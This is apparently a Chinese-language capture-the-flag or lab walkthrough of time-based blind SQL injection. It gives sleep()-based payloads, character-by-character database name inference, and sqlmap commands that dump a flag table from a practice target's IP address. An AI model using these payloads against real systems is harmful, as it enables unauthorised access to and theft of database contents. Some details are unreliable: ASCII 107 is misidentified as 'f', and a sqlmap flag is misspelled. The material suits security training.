盲注——延时注入

延时注入

靶场地址
原理：在没有得到任何回显的情况下，只能通过延迟页面的跳转来进行数据库的核对
第一题：

我们看到界面，首先在url栏进行GET传参，但是没有任何回显，界面没有变化

" and 1=2 %23

然后尝试延时注入，重新输入代码

" and sleep(5) %23

界面有明显的延迟，所以判定我们输入的sql代码得到了执行
于是，我们输入代码，来查询数据库的长度
and if(length(database())>9,sleep(5),1) #`

依次修改代码中的9依次递增，发现在代码是

and if(length(database())>12,sleep(5),1) #

的时候，界面没有任何延迟，于是判定数据库的长度是12个字节长
接着，我们利用ascii()的函数去找出数据库的第一个字母的ascii码值

and if(ascii(substr(database(),1,1))>90,sleep(5),1) #

修改90的值，依次递增，最终得到代码

and if(ascii(substr(database(),1,1))>107,sleep(5),1) #

的时候是没有任何延迟的，所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f

and if(ascii(substr(database(),2,1))>97,sleep(5),1) #

找出所有长度异常的包，一一和ascii码值对应，最终得到数据库名字

kanwolongxia

得到数据库名后，直接用sqlmap跑出表名

 python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia --tabales

再跑列名

 python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia -T loflag --columns

最终直接抛出数据

python sqlmap.py -u http://59.63.200.79:8815/Pass-13/index.php?id=1 -D kanwolongxia -T loflag -C flaglo --dump

得到flag